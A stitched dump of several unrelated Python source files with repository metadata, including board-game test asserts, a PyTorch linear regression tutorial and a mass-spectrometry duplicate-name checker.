gamma_move(board, 3, 4, 6) == 1 assert gamma_golden_possible(board, 3) == 1 assert gamma_move(board, 4, 0, 1) == 0 assert gamma_move(board, 5, 3, 1) == 0 assert gamma_move(board, 5, 3, 0) == 0 assert gamma_move(board, 6, 1, 2) == 0 assert gamma_move(board, 6, 0, 5) == 0 assert gamma_golden_move(board, 6, 6, 2) == 0 assert gamma_move(board, 1, 5, 3) == 0 assert gamma_free_fields(board, 1) == 4 assert gamma_move(board, 2, 2, 3) == 1 assert gamma_move(board, 3, 3, 0) == 0 assert gamma_move(board, 5, 1, 4) == 0 assert gamma_move(board, 6, 4, 0) == 0 assert gamma_move(board, 1, 1, 0) == 0 assert gamma_golden_move(board, 1, 5, 0) == 0 assert gamma_move(board, 2, 0, 2) == 0 assert gamma_move(board, 2, 2, 6) == 0 assert gamma_move(board, 3, 1, 0) == 0 assert gamma_move(board, 3, 4, 5) == 0 assert gamma_free_fields(board, 4) == 5 assert gamma_move(board, 6, 4, 3) == 0 assert gamma_golden_possible(board, 1) == 1 assert gamma_move(board, 2, 0, 4) == 1 assert gamma_move(board, 3, 5, 2) == 0 assert gamma_move(board, 4, 1, 6) == 0 assert gamma_move(board, 4, 2, 5) == 1 assert gamma_move(board, 5, 1, 4) == 0 assert gamma_move(board, 6, 2, 3) == 0 assert gamma_busy_fields(board, 6) == 5 assert gamma_move(board, 1, 1, 1) == 1 assert gamma_move(board, 1, 0, 4) == 0 assert gamma_move(board, 4, 1, 0) == 0 assert gamma_move(board, 4, 2, 1) == 1 assert gamma_move(board, 5, 0, 2) == 0 assert gamma_move(board, 6, 2, 6) == 0 assert gamma_move(board, 1, 1, 4) == 0 assert gamma_move(board, 2, 1, 0) == 0 assert gamma_move(board, 2, 1, 1) == 0 assert gamma_move(board, 3, 5, 3) == 0 assert gamma_move(board, 3, 0, 1) == 1 assert gamma_free_fields(board, 3) == 7 assert gamma_move(board, 4, 2, 1) == 0 assert gamma_move(board, 5, 0, 2) == 0 assert gamma_move(board, 6, 5, 3) == 0 assert gamma_move(board, 1, 2, 0) == 0 assert gamma_free_fields(board, 1) == 2 assert gamma_move(board, 2, 1, 4) == 0 board159991877 = gamma_board(board) assert board159991877 is not None assert board159991877 == ("61443\n" "414.6\n" "223.6\n" "..221\n" "2141.\n" "3145.\n" "56.46\n") del board159991877 board159991877 = None assert gamma_move(board, 3, 0, 5) == 0 assert gamma_move(board, 3, 4, 6) == 0 assert gamma_move(board, 4, 5, 3) == 0 assert gamma_move(board, 4, 3, 2) == 0 assert gamma_move(board, 5, 1, 3) == 1 assert gamma_busy_fields(board, 5) == 3 assert gamma_move(board, 6, 1, 4) == 0 assert gamma_move(board, 6, 1, 4) == 0 assert gamma_move(board, 1, 1, 4) == 0 assert gamma_move(board, 1, 1, 1) == 0 assert gamma_move(board, 2, 3, 4) == 1 assert gamma_move(board, 3, 3, 2) == 0 assert gamma_move(board, 3, 1, 2) == 0 assert gamma_move(board, 4, 2, 4) == 0 gamma_delete(board)
33.598639
46
0.651751
929
4,939
3.310011
0.051668
0.386341
0.434146
0.578862
0.868293
0.84065
0.668943
0.358374
0.218537
0.217886
0
0.121945
0.188095
4,939
146
47
33.828767
0.644888
0
0
0.121212
0
0
0.010101
0
0
0
0
0
0.840909
1
0
false
0
0.007576
0
0.007576
0
0
0
0
null
1
1
1
1
1
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
1
0
0
0
0
0
0
0
0
0
6
710b961e1ad5947f0ed951b546cf5901fe703f83
29
py
Python
SoundcloudDownloader/__init__.py
AmirMohammad2003/soundcloud-downloader
298cb4819013bed0d1fe4ac33900b562aa005cdf
[ "MIT" ]
1
2022-02-15T15:51:23.000Z
2022-02-15T15:51:23.000Z
SoundcloudDownloader/__init__.py
AmirMohammad2003/soundcloud-downloader
298cb4819013bed0d1fe4ac33900b562aa005cdf
[ "MIT" ]
null
null
null
SoundcloudDownloader/__init__.py
AmirMohammad2003/soundcloud-downloader
298cb4819013bed0d1fe4ac33900b562aa005cdf
[ "MIT" ]
null
null
null
from .downloader import SCDL
14.5
28
0.827586
4
29
6
1
0
0
0
0
0
0
0
0
0
0
0
0.137931
29
1
29
29
0.96
0
0
0
0
0
0
0
0
0
0
0
0
1
0
true
0
1
0
1
0
1
1
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
1
0
1
0
1
0
0
6
711bf1c98d07609f3f236bbc8c2ef1df6122afa1
14,950
py
Python
apps/drl/chpA01/e01/chp_a01_e01.py
yt7589/iching
6673da38f4c80e7fd297c86fedc5616aee8ac09b
[ "Apache-2.0" ]
32
2020-04-14T08:32:18.000Z
2022-02-09T07:05:08.000Z
apps/drl/chpA01/e01/chp_a01_e01.py
trinh-hoang-hiep/iching
e1feae5741c3cbde535d7a275b01d4f0cf9e21ed
[ "Apache-2.0" ]
1
2020-04-08T10:42:15.000Z
2020-04-15T01:38:03.000Z
apps/drl/chpA01/e01/chp_a01_e01.py
trinh-hoang-hiep/iching
e1feae5741c3cbde535d7a275b01d4f0cf9e21ed
[ "Apache-2.0" ]
4
2020-08-25T03:56:46.000Z
2021-05-11T05:55:51.000Z
# import numpy as np import torch from torch.utils.data import DataLoader import sklearn.model_selection as skm from apps.drl.chpA01.e01.chp_a01_e01_ds import ChpA01E01Ds from apps.drl.chpA01.e01.chp_a01_e01_model import ChpA01E01Model class ChpA01E01(object): def __init__(self): self.name = '' self.model_file = './work/lnrn.pt' def startup(self, args={}): print('线性回归 adam') #self.lnrn_plain() #self.lnrn_sgd() #self.lnrn_adam() #self.lnrn_adam_mse() #self.lnrn_with_ds() #self.lnrn_with_model() #self.lnrn_gpu() #self.lnrn_eval() #self.lnrn_save_load() self.lnrn_ds_split() # train and valid split def lnrn_ds_split(self): print('分配训练、验证、测试数据集 v0.0.1') # load dataset ds = ChpA01E01Ds(num=1000) total_count= len(ds) train_count = int(0.7 * total_count) valid_count = int(0.2 * total_count) test_count = total_count - train_count - valid_count train_ds, valid_ds, test_ds = torch.utils.data.random_split(ds, (train_count, valid_count, test_count)) train_batch_size = 10 valid_batch_size = 23 test_batch_size = 88 train_dl = DataLoader(train_ds, batch_size=train_batch_size, shuffle=True) valid_dl = DataLoader(valid_ds, batch_size=valid_batch_size, shuffle=False) test_dl = DataLoader(test_ds, batch_size=test_batch_size, shuffle=False) # define the model device = self.get_exec_device() model = ChpA01E01Model().to(device) # define the loss function criterion = torch.nn.MSELoss() # define optimization method #learning_params = model.parameters() # 需要epochs=100才能收敛 learning_params = [] for k, v in model.named_parameters(): if k == 'w001': learning_params.append({'params': v, 'lr': 0.01}) elif k == 'b001': learning_params.append({'params': v, 'lr': 0.1}) optimizer = torch.optim.Adam(learning_params, lr=0.001) epochs = 10 best_loss = 10000.0 unimproved_loop = 0 improved_threshold = 0.000000001 max_unimproved_loop = 5 train_done = False for epoch in range(epochs): model.train() for X, y_hat in train_dl: optimizer.zero_grad() X, y_hat = X.to(device), y_hat.to(device) y = model(X) loss = criterion(y, y_hat) lossv = 0.0 for Xv, yv_hat in valid_dl: with torch.no_grad(): Xv, yv_hat = Xv.to(device), yv_hat.to(device) yv = model(Xv) lossv += criterion(yv, yv_hat) lossv /= valid_count if lossv < best_loss: # save the model torch.save(model.state_dict(), self.model_file) if lossv < best_loss - improved_threshold: unimproved_loop = 0 else: unimproved_loop += 1 best_loss = lossv if unimproved_loop >= max_unimproved_loop: train_done = True break # early stopping处理 loss.backward() optimizer.step() print('{0}: w={1}; b={2}; loss={3};'.format(epoch, model.w001, model.b001, loss)) if train_done: break # 模型验证 test_loss = 0 for X, y_hat in test_dl: X, y_hat = X.to(device), y_hat.to(device) with torch.no_grad(): y = model(X) test_loss += criterion(y, y_hat) test_loss /= len(test_ds) print('测试集上代价函数值:{0};'.format(test_loss)) # 载入模型 ckpt = torch.load(self.model_file) m1 = ChpA01E01Model() print('初始值:w={0}; b={1};'.format(m1.w001, m1.b001)) m1.load_state_dict(ckpt) print('载入值:w={0}; b={1};'.format(m1.w001, m1.b001)) def lnrn_eval(self): # load dataset ds = ChpA01E01Ds(num=1000) batch_size = 10 dl = DataLoader(ds, batch_size=batch_size, shuffle=True) # define the model device = self.get_exec_device() model = ChpA01E01Model().to(device) # define the loss function criterion = torch.nn.MSELoss() # define optimization method #learning_params = model.parameters() # 需要epochs=100才能收敛 learning_params = [] for k, v in model.named_parameters(): if k == 'w001': learning_params.append({'params': v, 'lr': 0.01}) elif k == 'b001': learning_params.append({'params': v, 'lr': 0.1}) optimizer = torch.optim.Adam(learning_params, lr=0.001) epochs = 10 for epoch in range(epochs): model.train() for X, y_hat in dl: optimizer.zero_grad() X, y_hat = X.to(device), y_hat.to(device) y = model(X) loss = criterion(y, y_hat) loss.backward() optimizer.step() print('{0}: w={1}; b={2}; loss={3};'.format(epoch, model.w001, model.b001, loss)) # 模型验证 test_num = 100 test_ds = ChpA01E01Ds(num=test_num) model.eval() preds = [] batch_size = 30 test_dl = DataLoader(ds, batch_size=batch_size, shuffle=False) test_loss = 0 for X, y_hat in test_dl: X, y_hat = X.to(device), y_hat.to(device) with torch.no_grad(): y = model(X) test_loss += criterion(y, y_hat) test_loss /= test_num print('测试集上代价函数值:{0};'.format(test_loss)) def lnrn_save_load(self): # load dataset ds = ChpA01E01Ds(num=1000) batch_size = 10 dl = DataLoader(ds, batch_size=batch_size, shuffle=True) # define the model device = self.get_exec_device() model = ChpA01E01Model().to(device) # define the loss function criterion = torch.nn.MSELoss() # define optimization method #learning_params = model.parameters() # 需要epochs=100才能收敛 learning_params = [] for k, v in model.named_parameters(): if k == 'w001': learning_params.append({'params': v, 'lr': 0.01}) elif k == 'b001': learning_params.append({'params': v, 'lr': 0.1}) optimizer = torch.optim.Adam(learning_params, lr=0.001) epochs = 10 for epoch in range(epochs): model.train() for X, y_hat in dl: optimizer.zero_grad() X, y_hat = X.to(device), y_hat.to(device) y = model(X) loss = criterion(y, y_hat) loss.backward() optimizer.step() print('{0}: w={1}; b={2}; loss={3};'.format(epoch, model.w001, model.b001, loss)) # 模型验证 test_num = 100 test_ds = ChpA01E01Ds(num=test_num) model.eval() preds = [] batch_size = 30 test_dl = DataLoader(ds, batch_size=batch_size, shuffle=False) test_loss = 0 for X, y_hat in test_dl: X, y_hat = X.to(device), y_hat.to(device) with torch.no_grad(): y = model(X) test_loss += criterion(y, y_hat) test_loss /= test_num print('测试集上代价函数值:{0};'.format(test_loss)) print('模型保存和加载测试') # 保存模型 torch.save(model.state_dict(), self.model_file) # 载入模型 ckpt = torch.load(self.model_file) m1 = ChpA01E01Model() print('初始值:w={0}; b={1};'.format(m1.w001, m1.b001)) m1.load_state_dict(ckpt) print('载入值:w={0}; b={1};'.format(m1.w001, m1.b001)) def ds_exp(self): ds = ChpA01E01Ds(num=1000) batch_size = 10 dl = DataLoader(ds, batch_size=batch_size, shuffle=True) for X, y in dl: print('X: {0}; y: {1};'.format(X, y)) break def lnrn_with_ds(self): # load dataset ds = ChpA01E01Ds(num=1000) batch_size = 10 dl = DataLoader(ds, batch_size=batch_size, shuffle=True) # define the model w = torch.tensor(1.0, requires_grad=True) b = torch.tensor(0.0, requires_grad=True) # define the loss function criterion = torch.nn.MSELoss() # define optimization method optimizer = torch.optim.Adam([ {'params': w, 'lr': 0.01}, {'params': b, 'lr': 0.1} ], lr=0.001) epochs = 10 for epoch in range(epochs): for X, y_hat in dl: optimizer.zero_grad() y = w * X + b loss = criterion(y, y_hat) loss.backward() optimizer.step() print('{0}: w={1}; b={2}; loss={3};'.format(epoch, w, b, loss)) def lnrn_with_model(self): # load dataset ds = ChpA01E01Ds(num=1000) batch_size = 10 dl = DataLoader(ds, batch_size=batch_size, shuffle=True) # define the model model = ChpA01E01Model() # define the loss function criterion = torch.nn.MSELoss() # define optimization method #learning_params = model.parameters() # 需要epochs=100才能收敛 learning_params = [] for k, v in model.named_parameters(): if k == 'w001': learning_params.append({'params': v, 'lr': 0.01}) elif k == 'b001': learning_params.append({'params': v, 'lr': 0.1}) optimizer = torch.optim.Adam(learning_params, lr=0.001) epochs = 10 for epoch in range(epochs): model.train() for X, y_hat in dl: optimizer.zero_grad() y = model(X) loss = criterion(y, y_hat) loss.backward() optimizer.step() print('{0}: w={1}; b={2}; loss={3};'.format(epoch, model.w001, model.b001, loss)) def get_exec_device(self): gpu_num = torch.cuda.device_count() for gi in range(gpu_num): print(torch.cuda.get_device_name(gi)) pref_gi = 0 if torch.cuda.is_available(): if pref_gi is not None: device = 'cuda:{0}'.format(pref_gi) else: device = 'cuda' else: device = 'cpu' #device1 = 'cuda' if torch.cuda.is_available() else 'cpu' return device def lnrn_gpu(self): # load dataset ds = ChpA01E01Ds(num=1000) batch_size = 10 dl = DataLoader(ds, batch_size=batch_size, shuffle=True) # define the model device = self.get_exec_device() model = ChpA01E01Model().to(device) # define the loss function criterion = torch.nn.MSELoss() # define optimization method #learning_params = model.parameters() # 需要epochs=100才能收敛 learning_params = [] for k, v in model.named_parameters(): if k == 'w001': learning_params.append({'params': v, 'lr': 0.01}) elif k == 'b001': learning_params.append({'params': v, 'lr': 0.1}) optimizer = torch.optim.Adam(learning_params, lr=0.001) epochs = 10 for epoch in range(epochs): model.train() for X, y_hat in dl: optimizer.zero_grad() X, y_hat = X.to(device), y_hat.to(device) y = model(X) loss = criterion(y, y_hat) loss.backward() optimizer.step() print('{0}: w={1}; b={2}; loss={3};'.format(epoch, model.w001, model.b001, loss)) def lnrn_plain(self): X, y_hat = self.load_ds() w = torch.tensor(1.0, requires_grad=True) w_lr = 0.01 b = torch.tensor(0.0, requires_grad=True) b_lr = 0.1 epochs = 6000 X = torch.tensor(X) y_hat = torch.tensor(y_hat) for epoch in range(epochs): y = w * X + b tl = 0.5 * (y - y_hat)**2 loss = tl.sum() / 1000.0 loss.backward() with torch.no_grad(): w -= w_lr * w.grad w.grad = torch.zeros_like(w.grad) b -= b_lr * b.grad b.grad = torch.zeros_like(b.grad) print('{0}: w={1}; b={2}; loss={3};'.format(epoch, w, b, loss)) def lnrn_sgd(self): X, y_hat = self.load_ds() w = torch.tensor(1.0, requires_grad=True) b = torch.tensor(0.0, requires_grad=True) epochs = 6000 optimizer = torch.optim.SGD([ {'params': w, 'lr': 0.01}, {'params': b, 'lr': 0.1} ], 0.001) X = torch.tensor(X) y_hat = torch.tensor(y_hat) for epoch in range(epochs): optimizer.zero_grad() y = w * X + b tl = 0.5 * (y - y_hat)**2 loss = tl.sum() / 1000.0 loss.backward() optimizer.step() print('{0}: w={1}; b={2}; loss={3};'.format(epoch, w, b, loss)) def lnrn_adam(self): X, y_hat = self.load_ds() w = torch.tensor(1.0, requires_grad=True) b = torch.tensor(0.0, requires_grad=True) epochs = 6000 optimizer = torch.optim.Adam([ {'params': w, 'lr': 0.01}, {'params': b, 'lr': 0.1} ], lr=0.001) X = torch.tensor(X) y_hat = torch.tensor(y_hat) for epoch in range(epochs): optimizer.zero_grad() y = w * X + b tl = 0.5 * (y - y_hat)**2 loss = tl.sum() / 1000.0 loss.backward() optimizer.step() print('{0}: w={1}; b={2}; loss={3};'.format(epoch, w, b, loss)) def lnrn_adam_mse(self): X, y_hat = self.load_ds() w = torch.tensor(1.0, requires_grad=True) w_lr = 0.01 b = torch.tensor(0.0, requires_grad=True) b_lr = 0.1 epochs = 1000 criterion = torch.nn.MSELoss() optimizer = torch.optim.Adam([ {'params': w, 'lr': 0.01}, {'params': b, 'lr': 0.1} ], lr=0.001) X = torch.tensor(X) y_hat = torch.tensor(y_hat) for epoch in range(epochs): optimizer.zero_grad() y = w * X + b loss = criterion(y, y_hat) loss.backward() optimizer.step() print('{0}: w={1}; b={2}; loss={3};'.format(epoch, w, b, loss)) def load_ds(self): b = 1.6 w = 0.3 X = np.linspace(0, 1.0, num=1000) y = w*X + b return X, y
36.286408
111
0.515853
1,905
14,950
3.891339
0.091864
0.0259
0.016188
0.035074
0.769189
0.759881
0.751787
0.751787
0.734251
0.734251
0
0.054282
0.357993
14,950
412
112
36.286408
0.718066
0.071104
0
0.760933
0
0
0.047419
0
0
0
0
0
0
1
0.043732
false
0
0.017493
0
0.069971
0.06414
0
0
0
null
0
0
0
0
1
1
1
1
1
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
6
713306af80f9bda8ed19e15977036787dfe99363
65
py
Python
common/schemas/base.py
GymWorkoutApp/gwa_common
0ff307ed6786e2991a26fb4c0afc33767ea9697d
[ "Unlicense" ]
null
null
null
common/schemas/base.py
GymWorkoutApp/gwa_common
0ff307ed6786e2991a26fb4c0afc33767ea9697d
[ "Unlicense" ]
1
2019-01-14T11:05:45.000Z
2019-01-14T11:05:45.000Z
common/schemas/base.py
GymWorkoutApp/gwa_common
0ff307ed6786e2991a26fb4c0afc33767ea9697d
[ "Unlicense" ]
null
null
null
from schematics import Model class BaseSchema(Model): pass
10.833333
28
0.753846
8
65
6.125
0.875
0
0
0
0
0
0
0
0
0
0
0
0.2
65
5
29
13
0.942308
0
0
0
0
0
0
0
0
0
0
0
0
1
0
true
0.333333
0.333333
0
0.666667
0
1
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
1
1
1
0
1
0
0
6
85542a696f124dad5f9fbd2a37905013b91e33cb
47
py
Python
__init__.py
ari-s/XpyY
384500b8112a4475f2df3e736f324ab8724f66c4
[ "Artistic-2.0" ]
null
null
null
__init__.py
ari-s/XpyY
384500b8112a4475f2df3e736f324ab8724f66c4
[ "Artistic-2.0" ]
null
null
null
__init__.py
ari-s/XpyY
384500b8112a4475f2df3e736f324ab8724f66c4
[ "Artistic-2.0" ]
null
null
null
from . import inputfilter, helpers, operations
23.5
46
0.808511
5
47
7.6
1
0
0
0
0
0
0
0
0
0
0
0
0.12766
47
1
47
47
0.926829
0
0
0
0
0
0
0
0
0
0
0
0
1
0
true
0
1
0
1
0
1
1
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
1
0
1
0
1
0
0
6
8554be15e09c1822d22634b758aa964fa9ed48d7
54
py
Python
pbj/mesh/__init__.py
bem4solvation/pbj
4fa9c111596359192539787ae241a79d4316b15b
[ "MIT" ]
null
null
null
pbj/mesh/__init__.py
bem4solvation/pbj
4fa9c111596359192539787ae241a79d4316b15b
[ "MIT" ]
1
2022-02-18T17:34:37.000Z
2022-02-18T17:34:37.000Z
pbj/mesh/__init__.py
bem4solvation/pbj
4fa9c111596359192539787ae241a79d4316b15b
[ "MIT" ]
null
null
null
from .mesh_tools import * from .charge_tools import *
18
27
0.777778
8
54
5
0.625
0.55
0
0
0
0
0
0
0
0
0
0
0.148148
54
2
28
27
0.869565
0
0
0
0
0
0
0
0
0
0
0
0
1
0
true
0
1
0
1
0
1
0
0
null
1
0
0
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
1
0
1
0
1
0
0
6
8598df774d9eeecdd024d7959965af4b9f6bb33b
33
py
Python
bitbucketcli/__init__.py
jscheiber22/bitbucket-cli
e59cfec6b623d3b0764c57b87ffc30b6dc93ab49
[ "MIT" ]
null
null
null
bitbucketcli/__init__.py
jscheiber22/bitbucket-cli
e59cfec6b623d3b0764c57b87ffc30b6dc93ab49
[ "MIT" ]
null
null
null
bitbucketcli/__init__.py
jscheiber22/bitbucket-cli
e59cfec6b623d3b0764c57b87ffc30b6dc93ab49
[ "MIT" ]
null
null
null
from .bitbucket import Bitbucket
16.5
32
0.848485
4
33
7
0.75
0
0
0
0
0
0
0
0
0
0
0
0.121212
33
1
33
33
0.965517
0
0
0
0
0
0
0
0
0
0
0
0
1
0
true
0
1
0
1
0
1
1
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
1
0
1
0
1
0
0
6
85a0765a2793633cf4c9cac1fd0f21aaddc91051
21
py
Python
test/refactor/import_tree/pkgx/__init__.py
kirat-singh/jedi
65bc1c117b3175cb4d492484775c3fd7f207bc92
[ "MIT" ]
4,213
2015-01-02T15:43:22.000Z
2022-03-31T16:15:01.000Z
test/refactor/import_tree/pkgx/__init__.py
kirat-singh/jedi
65bc1c117b3175cb4d492484775c3fd7f207bc92
[ "MIT" ]
1,392
2015-01-02T18:43:39.000Z
2022-03-27T18:43:59.000Z
test/refactor/import_tree/pkgx/__init__.py
PeterJCLaw/jedi
070f191f550990c23220d7f209df076178307cf6
[ "MIT" ]
525
2015-01-02T19:07:31.000Z
2022-03-13T02:03:20.000Z
def pkgx(): pass
7
11
0.52381
3
21
3.666667
1
0
0
0
0
0
0
0
0
0
0
0
0.333333
21
2
12
10.5
0.785714
0
0
0
0
0
0
0
0
0
0
0
0
1
0.5
true
0.5
0
0
0.5
0
1
1
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
1
1
1
0
0
0
0
0
6
85c6e6e27c4642f174380f5896d05b5c193d6322
98
py
Python
template_filters.py
codeskyblue/bootstrap-tornado
bcfa0959b0125abdc2f018e15db39a07abc5d8b0
[ "MIT" ]
5
2017-10-18T19:30:16.000Z
2018-11-29T01:50:29.000Z
template_filters.py
codeskyblue/bootstrap-tornado
bcfa0959b0125abdc2f018e15db39a07abc5d8b0
[ "MIT" ]
null
null
null
template_filters.py
codeskyblue/bootstrap-tornado
bcfa0959b0125abdc2f018e15db39a07abc5d8b0
[ "MIT" ]
null
null
null
# coding: utf-8 # import hashlib def hashmd5(handler, s): return hashlib.md5(s).hexdigest()
12.25
37
0.683673
14
98
4.785714
0.857143
0
0
0
0
0
0
0
0
0
0
0.037037
0.173469
98
8
37
12.25
0.790123
0.132653
0
0
0
0
0
0
0
0
0
0
0
1
0.333333
false
0
0.333333
0.333333
1
0
1
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
1
0
0
1
1
1
0
0
6
a470cb91df1bd038e05291850dfc417d25cf4c6e
36
py
Python
src/models/__init__.py
jbed94/Faster-R-CNN
ebfc3ff0a84deca9672155085e57d09199023a85
[ "MIT" ]
5
2019-07-09T09:28:14.000Z
2020-09-04T13:56:02.000Z
src/models/__init__.py
jbed94/Faster-R-CNN
ebfc3ff0a84deca9672155085e57d09199023a85
[ "MIT" ]
null
null
null
src/models/__init__.py
jbed94/Faster-R-CNN
ebfc3ff0a84deca9672155085e57d09199023a85
[ "MIT" ]
1
2020-01-04T14:41:28.000Z
2020-01-04T14:41:28.000Z
from .faster_rcnn import FasterRCNN
18
35
0.861111
5
36
6
1
0
0
0
0
0
0
0
0
0
0
0
0.111111
36
1
36
36
0.9375
0
0
0
0
0
0
0
0
0
0
0
0
1
0
true
0
1
0
1
0
1
1
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
1
0
1
0
1
0
0
6
a48f3157ee8581ce9c031bbdf34b08f860994e0e
5,010
py
Python
MSDuplicateCheck.py
SLINGhub/MSOrganiser
918acda503093963a87a272f73bf6b07e8363e19
[ "MIT" ]
null
null
null
MSDuplicateCheck.py
SLINGhub/MSOrganiser
918acda503093963a87a272f73bf6b07e8363e19
[ "MIT" ]
null
null
null
MSDuplicateCheck.py
SLINGhub/MSOrganiser
918acda503093963a87a272f73bf6b07e8363e19
[ "MIT" ]
null
null
null
import sys from collections import Counter def check_duplicated_columns_in_wide_data(input_wide_data, output_option, logger = None, ingui = True, allow_multiple_istd = False): """Function to check for duplicate column names (usually Transition Name) in a given wide data. Args: input_wide_data (pandas DataFrame): A data frame of sample as rows and transition names as columns output_option (str): The name of the contents that the data frame contains. Example: Area, RT etc... logger (object): logger object created by start_logger in MSOrganiser ingui (bool): if True, print analysis status to screen allow_multiple_istd (bool): if True, allow input_wide_data to have mulitple internal standards """ # Convert the dataframe column name to a list column_name_list = input_wide_data.columns.values.tolist() # Get a list of duplicated column names duplicated_column_name_list = [key for key in Counter(column_name_list).keys() if Counter(column_name_list)[key] > 1] # When there are duplicated if len(duplicated_column_name_list) > 0: # Convert the list into a string duplicated_column_name_string = "" if allow_multiple_istd: duplicated_column_name_string = ", ".join(map(str, duplicated_column_name_list)) else: duplicated_column_name_string = ", ".join(duplicated_column_name_list) # Inform the user and stop the program if logger: logger.warning('In the %s data frame, ' + 'there are column names (Transition_Name) in the output files that are duplicated. ' + 'The data in these duplicated column names may be different. ' + 'Please check the input files especially if you are concatenating by columns. ' + 'Duplicated columns are %s', output_option, duplicated_column_name_string) if ingui: print('In the ' + output_option + ' data frame, ' + 'there are column names (Transition_Name) in the output files that are duplicated. ' + 'The data in these duplicated column names may be different. ' + 'Please check the input files especially if you are concatenating by columns. ' + 'Duplicated columns are ' + duplicated_column_name_string, flush=True) sys.exit(-1) def check_duplicated_sample_names_in_wide_data(input_wide_data, output_option, logger = None, ingui = True, allow_multiple_istd = False): """Function to check for duplicate sample names in a given wide data. Args: input_wide_data (pandas DataFrame): A data frame of sample as rows and transition names as columns output_option (str): The name of the contents that the data frame contains. Example: Area, RT etc... logger (object): logger object created by start_logger in MSOrganiser ingui (bool): if True, print analysis status to screen allow_multiple_istd (bool): if True, allow input_wide_data to have mulitple internal standards """ # Convert the sample name column to a list unique_Sample_Name_list = [] if allow_multiple_istd: unique_Sample_Name_list = input_wide_data[("Sample_Name","")].tolist() else: unique_Sample_Name_list = input_wide_data["Sample_Name"].tolist() # Get a list of duplicated column names duplicated_Sample_Name_list = [key for key in Counter(unique_Sample_Name_list).keys() if Counter(unique_Sample_Name_list)[key] > 1] # When there are duplicated if len(duplicated_Sample_Name_list) > 0: # Convert the list into a string duplicated_Sample_Name_string = ", ".join(duplicated_Sample_Name_list) # Inform the user and stop the program if logger: logger.warning('In the %s data frame, ' + 'there are sample names in the output files that are duplicated. ' + 'The data in these duplicated row names may be different. ' + 'Please check the input files especially if you are concatenating by rows. ' + 'Duplicated sample names are %s', output_option, duplicated_Sample_Name_string) if ingui: print('In the ' + output_option + ' data frame, ' + 'there are sample names in the output files that are duplicated. ' + 'The data in these duplicated row names may be different. ' + 'Please check the input files especially if you are concatenating by rows. ' , 'Duplicated sample names are ' + duplicated_Sample_Name_string, flush = True) sys.exit(-1)
51.649485
135
0.632735
626
5,010
4.870607
0.166134
0.039357
0.038373
0.042637
0.861594
0.790423
0.790423
0.755658
0.755658
0.726796
0
0.001725
0.305589
5,010
96
136
52.1875
0.874677
0.28024
0
0.538462
0
0
0.296906
0
0
0
0
0
0
1
0.038462
false
0
0.038462
0
0.076923
0.038462
0
0
0
null
0
0
0
1
1
1
1
1
1
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
6
a495c2d0574d766741a95b95cca307a0fd5ed011
156
py
Python
tests/tensortrade/unit/actions/test_action_scheme.py
bwcknr/tensortrade
376f5e4cc4ad7df271774088884fbe88f8feb7d8
[ "Apache-2.0" ]
34
2020-06-05T22:39:53.000Z
2022-01-09T03:09:12.000Z
tests/tensortrade/unit/actions/test_action_scheme.py
bwcknr/tensortrade
376f5e4cc4ad7df271774088884fbe88f8feb7d8
[ "Apache-2.0" ]
1
2022-01-17T06:38:27.000Z
2022-01-17T06:38:27.000Z
tests/tensortrade/unit/actions/test_action_scheme.py
bwcknr/tensortrade
376f5e4cc4ad7df271774088884fbe88f8feb7d8
[ "Apache-2.0" ]
8
2020-06-01T12:09:53.000Z
2022-01-18T14:45:29.000Z
from gym.spaces import Discrete from tensortrade import TradingContext from tensortrade.actions import ActionScheme from tensortrade.orders import Trade
19.5
44
0.858974
19
156
7.052632
0.578947
0.335821
0
0
0
0
0
0
0
0
0
0
0.121795
156
7
45
22.285714
0.978102
0
0
0
0
0
0
0
0
0
0
0
0
1
0
true
0
1
0
1
0
1
0
0
null
1
0
0
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
1
0
1
0
1
0
0
6
f1147796939ac2e1d57e13e3f8ea0bfc0440a336
21
py
Python
example_project/some_modules/third_modules/a154.py
Yuriy-Leonov/cython_imports_limit_issue
2f9e7c02798fb52185dabfe6ce3811c439ca2839
[ "MIT" ]
null
null
null
example_project/some_modules/third_modules/a154.py
Yuriy-Leonov/cython_imports_limit_issue
2f9e7c02798fb52185dabfe6ce3811c439ca2839
[ "MIT" ]
null
null
null
example_project/some_modules/third_modules/a154.py
Yuriy-Leonov/cython_imports_limit_issue
2f9e7c02798fb52185dabfe6ce3811c439ca2839
[ "MIT" ]
null
null
null
class A154: pass
7
11
0.619048
3
21
4.333333
1
0
0
0
0
0
0
0
0
0
0
0.214286
0.333333
21
2
12
10.5
0.714286
0
0
0
0
0
0
0
0
0
0
0
0
1
0
true
0.5
0
0
0.5
0
1
1
0
null
0
0
0
0
0
0
0
0
0
0
1
0
0
1
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
1
1
0
0
0
0
0
6
f119b5d4beb70730381e86765733b13ef1a9853c
13
py
Python
PTTLibrary/Version.py
csongs/PTTLibrary
8bfe17fb90bdbc15395ef6bf7d77eb6a2df4ddad
[ "MIT" ]
null
null
null
PTTLibrary/Version.py
csongs/PTTLibrary
8bfe17fb90bdbc15395ef6bf7d77eb6a2df4ddad
[ "MIT" ]
null
null
null
PTTLibrary/Version.py
csongs/PTTLibrary
8bfe17fb90bdbc15395ef6bf7d77eb6a2df4ddad
[ "MIT" ]
1
2019-11-21T15:17:01.000Z
